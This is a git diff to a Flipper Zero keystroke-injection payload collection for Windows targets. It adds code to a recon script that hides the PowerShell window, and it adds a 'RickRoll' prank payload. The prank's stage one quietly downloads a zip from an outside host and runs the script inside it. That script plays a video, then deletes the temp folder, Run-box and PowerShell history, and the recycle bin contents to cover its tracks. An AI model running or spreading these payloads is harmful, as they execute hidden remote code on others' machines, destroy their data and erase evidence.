diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 index 4743950..0b337ac 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 @@ -32,6 +32,11 @@ ############################################################################################################################################################ +$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);'; +add-type -name win -member $i -namespace native; +[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0); + + # MAKE LOOT FOLDER, FILE, and ZIP $FolderName = "$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm)" diff --git a/Payloads/Flip-ADV-RickRoll/StageOne.txt b/Payloads/Flip-ADV-RickRoll/StageOne.txt new file mode 100644 index 0000000..8a83307 --- /dev/null +++ b/Payloads/Flip-ADV-RickRoll/StageOne.txt @@ -0,0 +1,5 @@ +$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);'; +add-type -name win -member $i -namespace native; +[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0); + +cd "$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "rr.zip";Expand-Archive "rr.zip" -Force; .\rr.ps1 diff --git a/Payloads/Flip-ADV-RickRoll/rr.mp4 b/Payloads/Flip-ADV-RickRoll/rr.mp4 new file mode 100644 index 0000000..7afb1d4 Binary files /dev/null and b/Payloads/Flip-ADV-RickRoll/rr.mp4 differ diff --git a/Payloads/Flip-ADV-RickRoll/rr.ps1 b/Payloads/Flip-ADV-RickRoll/rr.ps1 new file mode 100644 index 0000000..8bdc4a9 --- /dev/null +++ b/Payloads/Flip-ADV-RickRoll/rr.ps1 @@ -0,0 +1,74 @@ +function Target-Comes { +Add-Type -AssemblyName System.Windows.Forms +$originalPOS = [System.Windows.Forms.Cursor]::Position.X +$o=New-Object -ComObject WScript.Shell + + while (1) { + $pauseTime = 3 + if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ + break + } + else { + $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime + } + } +} + +############################################################################################################################################# + + +#WPF Library for Playing Movie and some components +Add-Type -AssemblyName PresentationFramework + +Add-Type -AssemblyName System.ComponentModel +#XAML File of WPF as windows for playing movie + +[xml]$XAML = @" + + + + +"@ + +#Movie Path +[uri]$VideoSource = "$env:TMP\rr.mp4" + +#Devide All Objects on XAML +$XAMLReader=(New-Object System.Xml.XmlNodeReader $XAML) +$Window=[Windows.Markup.XamlReader]::Load( $XAMLReader ) +$VideoPlayer = $Window.FindName("VideoPlayer") + + +#Video Default Setting +$VideoPlayer.Volume = 100; +$VideoPlayer.Source = $VideoSource; +#$VideoPlayer.Padding = new Thickness(5); + + +Target-Comes + +$VideoPlayer.Play() + +#Show Up the Window +$Window.ShowDialog() | out-null + + +# Turn of capslock if it is left on + +$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') +if ($caps -eq $true){$key = New-Object -ComObject WScript.Shell;$key.SendKeys('{CapsLock}')} + + +# empty temp folder +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# delete run box history +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Empty recycle bin +Clear-RecycleBin -Force -ErrorAction SilentlyContinue \ No newline at end of file diff --git a/Payloads/Flip-ADV-RickRoll/rr.zip b/Payloads/Flip-ADV-RickRoll/rr.zip new file mode 100644 index 0000000..dab7d53 Binary files /dev/null and b/Payloads/Flip-ADV-RickRoll/rr.zip differ diff --git a/Payloads/Flip-Subscribe/Subscribe.ps1 b/Payloads/Flip-Subscribe/Subscribe.ps1 index a5c6c2f..8488f17 100644 --- a/Payloads/Flip-Subscribe/Subscribe.ps1 +++ b/Payloads/Flip-Subscribe/Subscribe.ps1 @@ -1,32 +1,3 @@ -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # -# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # -# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # -# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# tiktok.com/@i_am_jakoby # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - -<# -.DESCRIPTION - This program is designed to get your target to subscribe to your YouTube channel. -#> -############################################################################################################################################# - -# Enter your YouTube channel URL here, ONLY if you are rehosting this script yourself - -# $channel = "https://www.youtube.com/iamjakoby" - Add-Type -AssemblyName System.Windows.Forms $o=New-Object -ComObject WScript.Shell $url = -join($channel,"?sub_confirmation=1") diff --git a/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1 b/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1 index c287a83..92b9b7c 100644 --- a/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1 +++ b/Payloads/Flip-WallPaper-URL/Wallpaper-URL.ps1 @@ -98,6 +98,6 @@ Clear-RecycleBin -Force -ErrorAction SilentlyContinue } -Target-Comes +# Target-Comes Set-WallPaper -Image $wp -Style Fill -Clean-Exfil +# Clean-Exfil diff --git a/Payloads/test.txt b/Payloads/test.txt index 8d6bda5..0b8b28a 100644 --- a/Payloads/test.txt +++ b/Payloads/test.txt @@ -1 +1,2 @@ +# saps calc